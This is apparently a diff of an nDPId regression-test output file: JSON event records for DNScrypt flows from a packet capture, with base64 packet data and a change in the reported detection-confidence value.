00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YZAAH4Rg9UKAAAB1C\/kiJXjAbsCCHuObd4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAXcIEwgAH4RfVAKAAAB1C\/kiIW0AbsGBB6ibd0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YdAAH4Rg9QKAAAB1C\/kiMtYAbsCCHuObeIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380804} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAABQIEwAuX4RoiMKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAIc\/YhAAH4Rg9MKAAAB1C\/kiJ9HAbsCCHuObeABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YkgAH4RoBIKAAAB1C\/kiNwPAbsGBMhCbeEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380805} 00422{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YkAuX4RxOUKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YogAH4RoBEKAAAB1C\/kiO3VAbsGBLZ+bd8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA